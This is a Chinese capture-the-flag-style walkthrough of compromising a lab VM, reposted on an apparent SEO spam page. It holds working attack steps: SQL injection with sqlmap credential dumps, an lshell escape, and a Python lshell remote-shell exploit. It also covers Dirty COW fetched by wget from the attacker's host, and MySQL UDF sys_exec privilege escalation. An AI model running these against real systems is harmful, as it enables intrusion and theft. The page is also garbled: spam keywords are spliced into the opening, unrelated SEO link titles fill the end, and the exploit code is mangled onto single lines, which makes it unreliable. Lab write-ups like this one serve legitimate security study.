当前位置: 首页 > wzjs >正文

怎么把网站做漂亮个人网站制作流程

怎么把网站做漂亮,个人网站制作流程,简述传统营销与网络营销的整合,网站开发报价清单目录 配置靶机 目标IP探测 ​编辑端口扫描 139/445端口 Samba 80端口获取shell 绕过lshell 方法一 ​编辑 方法二 ​编辑提权 内核漏洞 mysql udf提权 配置靶机 使用vm新建虚拟机,选择vmdk文件打开。 目标IP探测 arp-scan -l 得出目标IP:19…

目录

配置靶机

目标IP探测

​编辑端口扫描

139/445端口 Samba

80端口获取shell

绕过lshell

方法一

​编辑

方法二

​编辑提权

内核漏洞

mysql udf提权


配置靶机


使用vm新建虚拟机,选择vmdk文件打开。

目标IP探测

arp-scan -l


得出目标IP:192.168.155.167
也可以使用

netdiscover -i eth0 -r 192.168.155.0/24


也可以使用

nmap -sN 192.168.155.0/24 --min-rate 1000


端口扫描

nmap -sV -sT --min-rate 1000 -p1-65535 IP


结果:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-11 21:53 EDT
Nmap scan report for 192.168.155.167
Host is up (0.0020s latency).
Not shown: 39528 closed tcp ports (conn-refused), 26003 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:36:BD:8F (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

139/445端口 Samba


发现催脆弱端口Samba:用于在同一局域网的Linux与windows系统直接的文件共享和打印共享的软件
并且标出了版本号3.x-4.x

msf中使用smb_version看到是3.0.28


然鹅我验证了很多CVE漏洞和payloads,发现都无法实现


80端口获取shell

访问一下,开局一个登录框


尝试万能密码,发现密码框可以

' or '1' =1 #


显示的内容好像没啥用,但是url怎么有个username=admin
猜测修改username的值,如果值存在于数据库中即显示信息
dirsearch扫出了database.sql,访问一下


发现了id=1 username=john的账号


果然信息改变了,虽然也没有什么用
回到登录框
username填john,password填1234试一下
报错,改变password = 123'


存在报错注入
利用sqlmap进行post注入
搜索表单:

sqlmap -u http://192.168.155.167/member.php --forms


找到表单值后查询数据库:

sqlmap -u http://192.168.155.167/member.php --forms --dbs


填值就是一直:

myusername=john&mypassword=test'&Submit=Login


表:

sqlmap -u http://192.168.155.167/member.php --forms -D members --tables


字段:

sqlmap -u http://192.168.155.167/member.php --forms -p mypassword -D members -T members --columns --batch


值:

sqlmap -u http://192.168.155.167/member.php --forms -p mypassword  --batch --level 3 -D members -T members -C 'username,password' --dump


出来结果了:

robert/ADGAdsafdfwt4gadfga== 
john/MyNameIsJohn


由于端口扫描的时候开启了ssh连接,尝试连接一下

ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedKeyTypes=+ssh-rsa john@192.168.155.167
ssh -oHostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedKeyTypes=+ssh-rsa robert@192.168.155.167


都能连接上,但是help一下可用命令,发现少的可怜,似乎是lshell

绕过lshell

方法一

在连接上靶机后执行

echo os.system("/bin/ksell")

方法二

在kali机中执行命令

cd tmp
searchspolit lshell


下载:

searchspolit -m 39632.c

查看使用条件:

vim 39632.py


因为这个脚本的编译环境是python2的,我就改成了python3可以编译的版本如下

import paramiko
import traceback
import sys
from time import sleep#
# Exploit lshell pathing vulnerability in <= 0.9.15.
# Runs commands on the remote system.
# @dronesec
#if len(sys.argv) < 4:print(f'{sys.argv[0]}: [USER] [PW] [IP] {{opt: port}}')sys.exit(1)try:print('[!] .............................')print('[!] lshell <= 0.9.15 remote shell.')print('[!] note: you can also ssh in and execute \'/bin/bash\'')print('[!] .............................')print(f'[!] Checking host {sys.argv[3]}...')ssh = paramiko.SSHClient()ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())if len(sys.argv) == 5:ssh.connect(sys.argv[3], port=int(sys.argv[4]), username=sys.argv[1], password=sys.argv[2])else:ssh.connect(sys.argv[3], username=sys.argv[1], password=sys.argv[2])# Verify lshellchannel = ssh.invoke_shell()while not channel.recv_ready():sleep(1)ret = channel.recv(2048).decode('utf-8', errors='ignore')channel.send('help help\n')while not channel.recv_ready():sleep(1)ret = channel.recv(2048).decode('utf-8', errors='ignore')if 'lshell' not in ret:if 'forbidden' in ret:print('[-] Cannot execute SSH commands')else:print('[-] Not an lshell environment')sys.exit(1)# Check vulnerabilitychannel.send('sudo\n')while not channel.recv_ready():sleep(1)ret = channel.recv(2048).decode('utf-8', errors='ignore')if 'Traceback' not in ret:print('[-] lshell version not vulnerable')sys.exit(1)channel.close()ssh.close()# Start pseudo-shellprint('[+] Vulnerable lshell found, starting shell...')ssh = paramiko.SSHClient()ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())if len(sys.argv) == 5:ssh.connect(sys.argv[3], port=int(sys.argv[4]),username=sys.argv[1], password=sys.argv[2])else:ssh.connect(sys.argv[3],username=sys.argv[1], password=sys.argv[2])while True:try:cmd = input('$ ')if not cmd:continueif cmd.startswith('/'):print('[!] Avoid absolute paths')continue# Escape payloadcmd = cmd.replace("'", r"\'")py_cmd = f'echo __import__(\'os\').system(\'{cmd.replace(" ", r"\t")}\')'if cmd.lower() in ('exit', 'quit'):break_, stdout, _ = ssh.exec_command(py_cmd)out = stdout.read().decode('utf-8', errors='replace')print(out.strip())except KeyboardInterrupt:print('\n[!] Ctrl+C detected, exiting...')breakexcept paramiko.AuthenticationException:print(f'[-] Authentication failed for {sys.argv[3]}')
except Exception as e:print(f'[-] Error: {str(e)}')traceback.print_exc(file=sys.stdout)
finally:if 'ssh' in locals():ssh.close()if 'channel' in locals() and not channel.closed:channel.close()

保存为1.py,利用:

python 1.py john MyNameIsJohn 192.168.155.167


提权

内核漏洞


查看内核版本:

uname -a


2.6.24,貌似可以使用脏牛提权
查看端口

netstate -tulnp


第一次尝试发现靶机没有gcc,无法编译,欧克准备直接下载编译好的版本

cd tmp
gcc -pthread dirtyc.c -o dirty -lcrypt
python -m http.server 9988
wget http://192.168.155.166/dirty


第二次发现文件没有执行权限,加个权限

chmod +x dirty


第三次发现不能执行二进制文件,嘻嘻

mysql udf提权


看端口的时候发现开启了3306端口,再看看mysql udf提权

find /var/www -name *.php
cat /var/www/checklogin.php


看到root/,连接

mysql -u root -p


回车即可连接
查看mysql udf表

SELECT * FROM mysql.func;


已经有可执行函数了,添加john到管理员:

select sys_exec('usermod -a -G admin john '); 
exit


执行

sudo su


成功

http://www.dtcms.com/wzjs/101445.html

相关文章:

  • 政府门户网站建设规划书南宁百度推广代理公司
  • 东营垦利灰色词优化培训
  • 合肥做网站排名广州企业网站seo
  • 网站报价收费单建什么网站可以长期盈利
  • 上海网站制作福州军事新闻俄乌最新消息
  • 做推广优化的网站有哪些内容怎么接推广
  • python网站开发实例教程软文发布公司
  • 公众号微信效果好的关键词如何优化
  • 公司商标标志设计seo关键词排名价格
  • 做网站申请域名的流程短视频平台推广方案
  • 企业网站深圳中国的网络营销公司
  • 做一个网站的完整教程高级搜索百度
  • 张家港做网站排名网络推广方案范文
  • 关键词整站排名优化整站优化多少钱
  • 中山企业网站制作公司品牌推广服务
  • 保定微网站 建设排名优化关键词
  • 微信网站建设和维护上海发布微信公众号
  • 做的网站是怎么被收录站长统计app网站
  • 网址生成济宁seo优化公司
  • 网站维护 静态页面企业宣传方式
  • 深圳最好的网站开发公司灵感关键词生成器
  • 网站建设找什么工作百度搜索趋势
  • 重庆网站建设 沛宣百度手机助手下载安卓版
  • 网站建设公司的职责网络销售适合什么人做
  • 吉林做网站数字营销公司排行榜
  • 做国内网站多少钱厦门seo顾问
  • 如何组做网站台州网站建设平台
  • 自己做视频类网站用哪个cms朝阳区seo
  • 深圳做企业网站的公司推荐品牌软文案例
  • 有关建筑企业的网站有哪些百度产品推广